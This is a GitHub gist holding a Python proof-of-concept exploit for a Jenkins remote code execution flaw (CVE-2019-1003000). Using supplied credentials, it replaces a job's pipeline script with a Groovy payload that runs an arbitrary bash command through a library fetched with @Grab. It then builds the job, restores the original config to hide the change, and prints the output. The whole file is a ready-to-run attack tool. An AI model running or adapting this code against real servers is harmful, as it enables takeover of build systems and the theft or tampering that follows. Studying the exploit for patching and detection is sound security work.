Forked from adamyordan/CVE-2019-1003000-Jenkins-RCE-POC.py
Created
February 14, 2019 15:14
-
-
Save xax007/535c319cb708bc02cd96d74ce2d6fde2 to your computer and use it in GitHub Desktop.
CVE-2019-1003000-Jenkins-RCE-POC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import argparse | |
import jenkins | |
import time | |
from xml.etree import ElementTree | |
payload = ''' | |
import org.buildobjects.process.ProcBuilder | |
@Grab('org.buildobjects:jproc:2.2.3') | |
class Dummy{ } | |
print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString() | |
''' | |
def run_command(url, cmd, job_name, username, password): | |
print '[+] connecting to jenkins...' | |
server = jenkins.Jenkins(url, username, password) | |
print '[+] crafting payload...' | |
ori_job_config = server.get_job_config(job_name) | |
et = ElementTree.fromstring(ori_job_config) | |
et.find('definition/script').text = payload % cmd | |
job_config = ElementTree.tostring(et, encoding='utf8', method='xml') | |
print '[+] modifying job with payload...' | |
server.reconfig_job(job_name, job_config) | |
time.sleep(3) | |
print '[+] putting job build to queue...' | |
queue_number = server.build_job(job_name) | |
time.sleep(3) | |
print '[+] waiting for job to build...' | |
queue_item_info = {} | |
while 'executable' not in queue_item_info: | |
queue_item_info = server.get_queue_item(queue_number) | |
time.sleep(1) | |
print '[+] restoring job...' | |
server.reconfig_job(job_name, ori_job_config) | |
print '[+] fetching output...' | |
last_build_number = server.get_job_info(job_name)['lastBuild']['number'] | |
console_output = server.get_build_console_output(job_name, last_build_number) | |
print '[+] OUTPUT:' | |
print console_output | |
if __name__ == '__main__': | |
parser = argparse.ArgumentParser(description='Jenkins RCE') | |
parser.add_argument('--url', help='target jenkins url') | |
parser.add_argument('--cmd', help='system command to be run') | |
parser.add_argument('--job', help='job name') | |
parser.add_argument('--username', help='username') | |
parser.add_argument('--password', help='password') | |
args = parser.parse_args() | |
run_command(args.url, args.cmd, args.job, args.username, args.password) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment